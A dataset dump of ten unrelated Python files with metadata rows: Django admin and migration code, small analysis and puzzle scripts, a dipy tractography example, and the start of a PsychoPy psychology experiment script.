| 30.112782 | 153 | 0.566042 | 514 | 4,005 | 4.280156 | 0.309339 | 0.040909 | 0.010909 | 0.020455 | 0.070909 | 0.027273 | 0 | 0 | 0 | 0 | 0 | 0.021986 | 0.29588 | 4,005 | 132 | 154 | 30.340909 | 0.757801 | 0.080649 | 0 | 0.131868 | 0 | 0.010989 | 0.097311 | 0.02911 | 0.010989 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.043956 | null | null | 0.054945 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1643d50d57eb06abf610b77d5aa52c2a3c6942 | 2,130 | py | Python | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | null | null | null | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | 1 | 2022-03-17T01:19:23.000Z | 2022-03-17T01:19:23.000Z | skytour/skytour/apps/solar_system/admin.py | ursomniac/skytour | 3320d96d7ca41b8f52ede87e7112477902a37a0e | [
"MIT"
] | null | null | null | from django.contrib import admin
from ..abstract.admin import AbstractObservation, ObservableObjectAdmin
from .models import (
Asteroid, AsteroidObservation,
Comet, CometObservation,
Planet, PlanetObservation,
MoonObservation,
MeteorShower,
)
# Observation admins: thin subclasses that bind AbstractObservation's shared
# behaviour to each concrete observation model. They are attached as `inlines`
# on the object admins below (presumably AbstractObservation derives from an
# inline admin class -- defined in ..abstract.admin, confirm there).
class AsteroidObservationAdmin(AbstractObservation):
    model = AsteroidObservation
class CometObservationAdmin(AbstractObservation):
    model = CometObservation
class PlanetObservationAdmin(AbstractObservation):
    model = PlanetObservation
class MoonObservationAdmin(AbstractObservation):
    model = MoonObservation
class MeteorShowerAdmin(admin.ModelAdmin):
    """Admin for meteor showers: activity dates, radiant position and ZHR in
    the change list; name search; grouped edit form."""
    model = MeteorShower
    list_display = ['pk', 'name', 'radiant_ra', 'radiant_dec', 'start_date', 'peak_date', 'end_date', 'zhr']
    search_fields = ['name']
    # Edit form rows: identity / activity window / radiant / characteristics / notes.
    fieldsets = (
        (None, {
            'fields': [
                ('name', 'slug'),
                ('start_date', 'peak_date', 'end_date'),
                ('radiant_ra', 'radiant_dec', 'longitude'),
                ('speed', 'zhr', 'parent_body'),
                'notes',
            ]
        }),
    )
class PlanetAdmin(ObservableObjectAdmin):
    """Admin for planets with inline observations; moon_list is computed, so it
    is exposed read-only."""
    model = Planet
    list_display = [
        'pk', 'name', 'diameter', 'load', 'moon_list', 'n_obs', 'obs_date'
    ]
    list_display_links = ['pk', 'name']
    readonly_fields = ['moon_list',]
    inlines = [PlanetObservationAdmin]
    save_on_top = True
class AsteroidAdmin(ObservableObjectAdmin):
    """Admin for asteroids; listed by catalogue number and name, with inline observations."""
    model = Asteroid
    list_display = ['number', 'name', 'diameter', 'est_brightest', 'h', 'n_obs', 'obs_date']
    list_display_links = ['number', 'name']
    inlines = [AsteroidObservationAdmin]
    save_on_top = True
class CometAdmin(ObservableObjectAdmin):
    """Admin for comets, with inline observations."""
    model = Comet
    list_display = ['pk', 'name', 'status', 'n_obs', 'obs_date']
    list_display_links = ['pk', 'name']
    inlines = [CometObservationAdmin]
    save_on_top = True
# Wire each model to its admin on the default site; MoonObservation gets the
# stock ModelAdmin (no customisation needed).
admin.site.register(MeteorShower, MeteorShowerAdmin)
admin.site.register(Planet, PlanetAdmin)
admin.site.register(Asteroid, AsteroidAdmin)
admin.site.register(Comet, CometAdmin)
admin.site.register(MoonObservation)
af199e4897719a80335ff5ec4f44958d12eb6383 | 2,570 | py | Python | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | analyze.py | dangoldin/annual-stats-analysis | 8aac0c864ce9ab7d602a656f7a529dbcb04eae95 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys, csv, re, pprint, math
from collections import namedtuple, Counter
# Matches any number in free text: optional sign, int or decimal, optional exponent.
RE_ALL_NUM = re.compile(r'[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')
# One diary row: date, bed/wake times, 3x physical + 3x mood ratings, then intake columns.
Row = namedtuple('Row', ('date','sleep','wakeup','physical_morning','physical_day','physical_evening','mood_morning','mood_day','mood_evening','food','drink','coffee','tea','soda'))
def sleep_duration(sleep, wakeup):
    """Hours slept, given bed and wake times on a 12-hour clock.

    A bed time numerically at or above the wake time is treated as before
    midnight, so 12 hours are folded out of it before subtracting.
    """
    bed = float(sleep)
    rise = float(wakeup)
    if bed >= rise:
        bed -= 12.0
    return rise - bed
def read_file(fn):
    """Parse the diary CSV at ``fn`` into a list of Row namedtuples,
    skipping the header line."""
    with open(fn, 'r') as f:
        r = csv.reader(f, delimiter=',')
        # next(r) works on Python 2.6+ and 3; the original r.next() is Python-2-only.
        next(r)  # Skip header
        return [Row(*l) for l in r]
def count_dim(rows, dim):
    """Tally how often each value of attribute `dim` occurs across the rows."""
    values = (getattr(row, dim) for row in rows)
    return Counter(values)
def total_num(val):
    """Sum every number (int, decimal or scientific notation) embedded in the
    free-text string `val`; 0 when none are found."""
    # Each findall() hit is a group tuple; group 0 is the full numeric part.
    return sum([float(match[0]) for match in RE_ALL_NUM.findall(val)])
def total_map(maps):
    """Merge a sequence of {name: count-string} dicts into one Counter of
    float totals per name."""
    combined = Counter()
    for mapping in maps:
        # Counter.update adds values for shared keys instead of replacing them.
        combined.update(to_num_map(mapping))
    return combined
def to_num_map(m):
    """Convert a {key: numeric-string} mapping to {key: float}."""
    # .items() works on both Python 2 and 3; the original .iteritems() is Python-2-only.
    return dict((k, float(v)) for k, v in m.items())
def num_map(row):
    """Parse bullet lines like "- 2 beer" into {'beer': '2'}.

    Values are kept as strings; to_num_map() converts them later.
    """
    pairs = {}
    for line in row.split("\n"):
        if len(line) > 0:
            # "- 2 beer" -> strip the bullet, then split count from name once.
            count, name = line.strip('-').strip().split(' ', 1)
            pairs[name] = count
    return pairs
def stats(d):
    """Basic descriptive statistics for a non-empty sequence of numbers.

    Returns a dict with total, avg, max, min, population variance and
    standard deviation.
    """
    total = sum(d)
    n = len(d)
    mean = total / n
    squared_dev = sum((value - mean) * (value - mean) for value in d)
    variance = squared_dev / n
    return {
        'total': total,
        'avg': mean,
        'max': max(d),
        'min': min(d),
        'var': variance,
        'std': math.sqrt(variance),
    }
def summarize(rows):
    """Aggregate diary rows into per-dimension tallies plus sleep, coffee and
    drink statistics; returns one flat dict keyed by short labels."""
    # Frequency tables for the three physical and three mood ratings.
    summary = {
        'p_m': count_dim(rows, 'physical_morning'),
        'p_d': count_dim(rows, 'physical_day'),
        'p_e': count_dim(rows, 'physical_evening'),
        'm_m': count_dim(rows, 'mood_morning'),
        'm_d': count_dim(rows, 'mood_day'),
        'm_e': count_dim(rows, 'mood_evening'),
    }
    summary['sleep_stats'] = stats([sleep_duration(r.sleep, r.wakeup) for r in rows])
    summary['coffee_stats'] = stats([float(r.coffee) for r in rows])
    summary['drink_stats'] = stats([total_num(r.drink) for r in rows])
    # Per-beverage totals parsed out of the free-text drink column.
    summary['drink_details'] = total_map([num_map(r.drink) for r in rows])
    return summary
if __name__ == '__main__':
    # Entry point: analyze.py <csv-file>  (Python 2 print statement below).
    if len(sys.argv) != 2:
        print 'Specify a filename'
        exit(1)
    fn = sys.argv[1]
    rows = read_file(fn)
    summary = summarize(rows)
    # width=2 forces pprint to put (almost) every item on its own line.
    pprint.pprint(summary, width=2)
| 26.494845 | 181 | 0.589883 | 406 | 2,570 | 3.509852 | 0.263547 | 0.039298 | 0.058947 | 0.035088 | 0.057544 | 0.022456 | 0 | 0 | 0 | 0 | 0 | 0.006176 | 0.243969 | 2,570 | 96 | 182 | 26.770833 | 0.727226 | 0.010895 | 0 | 0.026316 | 0 | 0 | 0.137008 | 0.015354 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.026316 | null | null | 0.039474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1c0b691c86765c21e591aade803cbb04e16f02 | 356 | py | Python | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | apps/data/migrations/0071_rename_code_id_taibifcode_objid.py | Jeffersonktw/portal20 | 3db8ef9379410d589202bcac40b667a63872c8ea | [
"MIT"
] | null | null | null | # Generated by Django 3.2.7 on 2022-01-06 03:42
from django.db import migrations
class Migration(migrations.Migration):
    """Rename TaibifCode.code_id to objid; pure column rename, no data change."""
    dependencies = [
        ('data', '0070_taibifcode'),
    ]
    operations = [
        migrations.RenameField(
            model_name='taibifcode',
            old_name='code_id',
            new_name='objid',
        ),
    ]
| 18.736842 | 47 | 0.575843 | 38 | 356 | 5.263158 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077236 | 0.308989 | 356 | 18 | 48 | 19.777778 | 0.735772 | 0.126404 | 0 | 0 | 1 | 0 | 0.132686 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1da69987c607f169e992928bfd2a046a0267de | 288 | py | Python | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | 1-beginner/1074.py | alenvieira/uri-online-judge-solutions | ca5ae7064d84af4dae12fc37d4d14ee441e49d06 | [
"MIT"
] | null | null | null | n = int(input())
values = [int(input()) for _ in range(n)]
for value in values:
msg = 'ODD '
if value % 2 == 0:
msg = 'EVEN '
if value < 0:
msg = msg + 'NEGATIVE'
elif value > 0:
msg = msg + 'POSITIVE'
else:
msg = 'NULL'
print(msg)
| 20.571429 | 41 | 0.479167 | 39 | 288 | 3.512821 | 0.512821 | 0.087591 | 0.131387 | 0.175182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022099 | 0.371528 | 288 | 13 | 42 | 22.153846 | 0.734807 | 0 | 0 | 0 | 0 | 0 | 0.100694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
af1e6cb4f796533701e76e497ff7a7e2738a483f | 342 | py | Python | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 717 | 2020-10-18T05:24:17.000Z | 2022-03-30T11:47:16.000Z | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 42 | 2020-10-22T15:37:22.000Z | 2022-02-27T04:52:27.000Z | service/util/log.py | mutouxia/kamiFaka | d5750de11de86f7a961ada4c11dd9f7ccaa38f12 | [
"MIT"
] | 267 | 2020-10-26T09:04:30.000Z | 2022-03-30T05:52:04.000Z | import time
# Simple file logger: the log() helper below appends timestamped messages.
# import sys
# def get_cur_info():
#     return sys._getframe().f_code.co_filename + ' line ' + str(sys._getframe().f_lineno)
# Disabled helper above: returns the caller's file path and line number.
# get_cur_info()
def log(msg):
    """Append `msg` to service.log, prefixed with a "YYYY-mm-dd HH:MM:SS" timestamp."""
    # BUGFIX: encoding was the typo 'utf=8'; it only worked because CPython's
    # codec lookup normalizes non-alphanumeric characters -- spell it properly.
    with open('service.log', 'a', encoding='utf-8') as f:
        f.write('\n' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ' ' + str(msg))
af20c0a712f660c07e5c2681caabbc7632976ab2 | 301 | py | Python | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | null | null | null | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | 1 | 2020-07-08T02:57:50.000Z | 2020-07-08T02:57:50.000Z | test/deprecated/test6.py | davidliyutong/Flint | 4e2552dac8d781c21e8998ad68bbf1b986b09258 | [
"MIT"
] | null | null | null | import numpy as np
import scipy.linalg.blas as blas
import numba.cuda as cuda
import pyculib.blas as cublas
A = np.random.randn(3, 3)
B = np.random.randn(3, 3)
C = blas.sgemm(1.0, A, B)
print(C)
A_d = cuda.to_device(A)
B_d = cuda.to_device(B)
C_d = cublas.gemm("N", "N", 1.0, A_d, B_d)
print(C_d)
| 17.705882 | 42 | 0.681063 | 68 | 301 | 2.897059 | 0.382353 | 0.060914 | 0.13198 | 0.142132 | 0.152284 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031621 | 0.159468 | 301 | 16 | 43 | 18.8125 | 0.747036 | 0 | 0 | 0 | 0 | 0 | 0.006645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af37533e55a971d42bae3b017760683c860705c1 | 3,922 | py | Python | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/NEURO-LEARN | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 8 | 2019-05-29T09:38:30.000Z | 2021-01-20T03:36:59.000Z | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/neurolearn_dev | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | env/share/doc/dipy/examples/tracking_eudx_tensor.py | Raniac/NEURO-LEARN | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | [
"Apache-2.0"
] | 1 | 2020-07-17T12:49:49.000Z | 2020-07-17T12:49:49.000Z | """
=================================================
Deterministic Tracking with EuDX on Tensor Fields
=================================================
In this example we do deterministic fiber tracking on Tensor fields with EuDX
[Garyfallidis12]_.
This example requires to import example `reconst_dti.py` to run. EuDX was
primarily made with cpu efficiency in mind. Therefore, it should be useful to
give you a quick overview of your reconstruction results with the help of
tracking.
"""
import os
import numpy as np
import nibabel as nib
# Run the DTI reconstruction example first if its output files are missing;
# importing the module executes it as a side effect.
if not os.path.exists('tensor_fa.nii.gz'):
    import reconst_dti
"""
EuDX will use the directions (eigen vectors) of the Tensors to propagate
streamlines from voxel to voxel and fractional anisotropy to stop tracking.
"""
# Load the FA map and tensor eigenvectors produced by reconst_dti.
fa_img = nib.load('tensor_fa.nii.gz')
FA = fa_img.get_data()
evecs_img = nib.load('tensor_evecs.nii.gz')
evecs = evecs_img.get_data()
"""
In the background of the image the fitting will not be accurate because the
measured signal there is mostly noise, and we may find FA values that are NaN
(not a number). We can easily remove these in the following way.
"""
# Background voxels are noise and can yield NaN FA; zero them so tracking stops there.
FA[np.isnan(FA)] = 0
"""
EuDX takes as input discretized voxel directions on a unit sphere. Therefore,
it is necessary to discretize the eigen vectors before feeding them in EuDX.
For the discretization procedure we use an evenly distributed sphere of 724
points which we can access using the get_sphere function.
"""
from dipy.data import get_sphere
# Evenly distributed 724-point sphere used to discretize the eigenvector directions.
sphere = get_sphere('symmetric724')
"""
We use quantize_evecs (evecs here stands for eigen vectors) to apply the
discretization.
"""
from dipy.reconst.dti import quantize_evecs
# Map each voxel's principal eigenvector onto the nearest sphere vertex index.
peak_indices = quantize_evecs(evecs, sphere.vertices)
"""
EuDX is the fiber tracking algorithm that we use in this example.
The most important parameters are the first one which represents the
magnitude of the peak of a scalar anisotropic function, the
second which represents the indices of the discretized directions of
the peaks and odf_vertices are the vertices of the input sphere.
"""
from dipy.tracking.eudx import EuDX
from dipy.tracking.streamline import Streamlines
# Track from 50000 seeds, following the discretized peak directions and
# stopping wherever FA drops below a_low=0.2.
eu = EuDX(FA.astype('f8'), peak_indices, seeds=50000,
          odf_vertices=sphere.vertices, a_low=0.2)
tensor_streamlines = Streamlines(eu)
"""
We can now save the results in the disk. For this purpose we can use the
TrackVis format (``*.trk``). First, we need to import ``save_trk`` function.
"""
from dipy.io.streamline import save_trk
"""
Save the streamlines.
"""
ten_sl_fname = 'tensor_streamlines.trk'
# Save in TrackVis format with an identity affine and the source image's voxel size.
save_trk(ten_sl_fname, tensor_streamlines,
         affine=np.eye(4),
         vox_size=fa_img.header.get_zooms()[:3],
         shape=FA.shape)
"""
If you don't want to use Trackvis to visualize the file you can use our
lightweight `dipy.viz` module.
"""
try:
    from dipy.viz import window, actor
except ImportError:
    raise ImportError('Python fury module is not installed')
    # NOTE(review): the two lines below are unreachable -- the raise above
    # exits first. Confirm whether sys.exit() was meant INSTEAD of the raise.
    import sys
    sys.exit()
"""
Create a scene.
"""
# Scene that will hold the streamline actor below.
ren = window.Renderer()
"""
Every streamline will be coloured according to its orientation
"""
from dipy.viz import colormap as cmap
"""
`actor.line` creates a streamline actor for streamline visualization
and `ren.add` adds this actor to the scene
"""
# Colour each streamline by its orientation and add it to the scene.
ren.add(actor.streamtube(tensor_streamlines,
                         cmap.line_colors(tensor_streamlines)))
print('Saving illustration as tensor_tracks.png')
# White background, then render straight to a PNG file.
ren.SetBackground(1, 1, 1)
window.record(ren, out_path='tensor_tracks.png', size=(600, 600))
# Enables/disables interactive visualization
interactive = False
if interactive:
    window.show(ren)
"""
.. figure:: tensor_tracks.png
:align: center
Deterministic streamlines with EuDX on a Tensor Field.
References
----------
.. [Garyfallidis12] Garyfallidis E., "Towards an accurate brain tractography",
PhD thesis, University of Cambridge, 2012.
.. include:: ../links_names.inc
"""
| 25.633987 | 81 | 0.72922 | 575 | 3,922 | 4.897391 | 0.429565 | 0.019886 | 0.01598 | 0.009233 | 0.019176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010341 | 0.161652 | 3,922 | 152 | 82 | 25.802632 | 0.846107 | 0.134625 | 0 | 0 | 0 | 0 | 0.122435 | 0.015048 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.341463 | 0 | 0.341463 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
af4209c29081da3f889072766ee3f06622d6ef57 | 374 | py | Python | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:38.000Z | 2018-11-09T22:08:38.000Z | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/9-billion-names-of-God-the-integer/Python/9-billion-names-of-god-the-integer-2.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | def partitions(N):
diffs,k,s = [],1,1
while k * (3*k-1) < 2*N:
diffs.extend([(2*k - 1, s), (k, s)])
k,s = k+1,-s
out = [1] + [0]*N
for p in range(0, N+1):
x = out[p]
for (o,s) in diffs:
p += o
if p > N: break
out[p] += x*s
return out
# Demo: print p(n) at a few checkpoints (Python 2 print statement).
p = partitions(12345)
for x in [23,123,1234,12345]: print x, p[x]
af4233fc73bef13415ed0e5a7bb3cc5f4af63d98 | 659 | py | Python | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 1 | 2021-10-04T07:14:40.000Z | 2021-10-04T07:14:40.000Z | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 11 | 2022-01-24T20:42:11.000Z | 2022-02-27T23:58:24.000Z | Codeforce/CF59-D2-A/Word.py | Sonu589/Hacktoberfest-2025 | 06397aa12a41967cb112722666e384007d87dbc4 | [
"MIT"
] | 1 | 2021-10-05T04:40:26.000Z | 2021-10-05T04:40:26.000Z | #!/usr/bin/env python3
import sys
input = sys.stdin.readline
############ ---- Input Functions, courtesy of 'thekushalghosh' ---- ############
def inp():
    """Read one line as an int (input is rebound to sys.stdin.readline above)."""
    return(int(input()))
def inlt():
    """Read one line as a list of ints."""
    return(list(map(int, input().split())))
def insr():
    """Read one line as a list of characters, dropping the final character.

    NOTE(review): assumes the line ends with a newline (readline keeps it);
    on a last line without one this would drop a real character -- confirm.
    """
    s = input()
    return(list(s[:len(s) - 1]))
def invr():
    """Read one line as a map iterator of ints."""
    return(map(int, input().split()))
if __name__ == "__main__":
    # Read the word, then force it entirely to whichever case already dominates.
    s = insr()
    countl = sum(1 for ch in s if ch.islower())
    # Everything that is not a lowercase letter (uppercase, digits, symbols)
    # counts toward the uppercase tally, mirroring the original logic.
    countu = len(s) - countl
    if countu > countl:
        print(''.join(ch.upper() for ch in s))
    else:
        # Ties go to lowercase.
        print(''.join(ch.lower() for ch in s))
| 17.810811 | 80 | 0.515933 | 92 | 659 | 3.608696 | 0.467391 | 0.072289 | 0.066265 | 0.096386 | 0.10241 | 0.10241 | 0.10241 | 0 | 0 | 0 | 0 | 0.010309 | 0.264036 | 659 | 36 | 81 | 18.305556 | 0.674227 | 0.115326 | 0 | 0.086957 | 0 | 0 | 0.014363 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.130435 | 0.217391 | 0.086957 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
af460998cc26e43cba546213ee7d2d2af0002a95 | 37,065 | py | Python | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | runExpPsychopy/Exp1_olderPsychopy_correctStructure0214_writeResp.py | miaoli-psy/CrowdingNumerosityGit | 625c2693fd210b936e0cf95e9ca2d35c808251b8 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This experiment was created using PsychoPy2 Experiment Builder (v1.84.2),
on February 14, 2019, at 13:04
If you publish work using this script please cite the PsychoPy publications:
Peirce, JW (2007) PsychoPy - Psychophysics software in Python.
Journal of Neuroscience Methods, 162(1-2), 8-13.
Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy.
Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008
"""
#relative files (condition files and stimuli pictures, in C:\Users\MiaoLi\Desktop\SCALab\Programming\Crowding_and_numerosity\setupExp_psychopy\Psychopybuilder\Crowding\Miao_exp_lilleLab\Exp1_short_olderPsychopy)
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound, monitors
from psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,
STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)
import numpy as np # whole numpy lib is available, prepend 'np.'
from numpy import (sin, cos, tan, log, log10, pi, average,
sqrt, std, deg2rad, rad2deg, linspace, asarray)
from numpy.random import random, randint, normal, shuffle
import os # handy system and path functions
import sys # to get file system encoding
# Ensure that relative paths start from the same directory as this script
# Anchor the working directory at this script's location so relative paths resolve.
_thisDir = os.path.dirname(os.path.abspath(__file__)).decode(sys.getfilesystemencoding())
os.chdir(_thisDir)
# Store info about the experiment session
expName = 'Crwdng_Nmrsty_older_runOnLab1' # from the Builder filename that created this script
# Session dialog fields; list values become drop-downs, u'' become free text.
expInfo = {u'handedness': ['Right handed', 'Left handed'],
u'participant': u'',
u'age': u'',
u'blockOrder': u'',
u'sex': ['Female','Male'],
u'group': ['1','2']}
dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
if dlg.OK == False:
    core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc
filename = _thisDir + os.sep + u'data_Crwdng_Nmrsty1/group_%s_participant_%s_date_%s' % (expInfo['group'], expInfo['participant'], expInfo['date'])
# An ExperimentHandler isn't essential but helps with data saving
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=True,
dataFileName=filename)
# save a log file for detail verbose info
logFile = logging.LogFile(filename+'.log', level=logging.EXP)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
endExpNow = False # flag for 'escape' or other condition => quit the exp
# Start Code - component code to be run before the window creation
# Setup the Window
# Builder's default window (disabled in favour of the calibrated lab monitor below):
#win = visual.Window(
#    size=(1024, 768), fullscr=True, screen=0,
#    allowGUI=False, allowStencil=False,
#    monitor='testMonitor', color=[0,0,0], colorSpace='rgb',
#    blendMode='avg', useFBO=True)
# Lab CRT: 57 cm wide, viewed from 40.5 cm.
myMonitor= monitors.Monitor('CRT_Lille', width = 57, distance = 40.5)#TODO
myMonitor.setSizePix([1024, 768])
win = visual.Window(monitor=myMonitor,
size = [1024, 768],
screen =1,
units='pix',
fullscr = False,
allowGUI = False,
winType = 'pyglet',
color = (0,0,0))
# store frame rate of monitor if we can measure it
expInfo['frameRate'] = win.getActualFrameRate()
if expInfo['frameRate'] != None:
    frameDur = 1.0 / round(expInfo['frameRate'])
else:
    frameDur = 1.0 / 100.0 # could not measure, so guess
#print(expInfo['frameRate'])
# Initialize components for Routine "instr1"
instr1Clock = core.Clock()
# Initialize components for Routine "fixation"
fixationClock = core.Clock()
# Initialize components for Routine "practice"
practiceClock = core.Clock()
# Practice image stimulus; image='sin' is a placeholder that is replaced
# per trial with p_img.setImage(...) later in the script.
p_img = visual.ImageStim(
win=win, name='p_img',
image='sin', mask=None,
ori=0, pos=(0, 0), size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "endP"
endPClock = core.Clock()
# Initialize components for Routine "instr2"
instr2Clock = core.Clock()
# Initialize components for Routine "fixation"
# NOTE: fixationClock is created a second time here (Builder emits one per
# use of the routine); the rebinding is redundant but harmless.
fixationClock = core.Clock()
# Initialize components for Routine "trial"
trialClock = core.Clock()
# Main trial image stimulus; 'sin' placeholder replaced per trial via
# image.setImage(imageFile) in the trial loop.
image = visual.ImageStim(
win=win, name='image',
image='sin', mask=None,
ori=0, pos=(0, 0), size=None,
color=[1,1,1], colorSpace='rgb', opacity=1,
flipHoriz=False, flipVert=False,
texRes=128, interpolate=True, depth=0.0)
# Initialize components for Routine "break_3"
break_3Clock = core.Clock()
# Initialize components for Routine "thanks"
thanksClock = core.Clock()
# Create some handy timers
globalClock = core.Clock() # to track the time since experiment started
routineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine
# ------Prepare to start Routine "instr1"-------
t = 0
instr1Clock.reset()  # clock
frameN = -1
continueRoutine = True
# keep track of which components have finished
instr1Components = []  # routine is drawn in code below; no Builder components
for thisComponent in instr1Components:
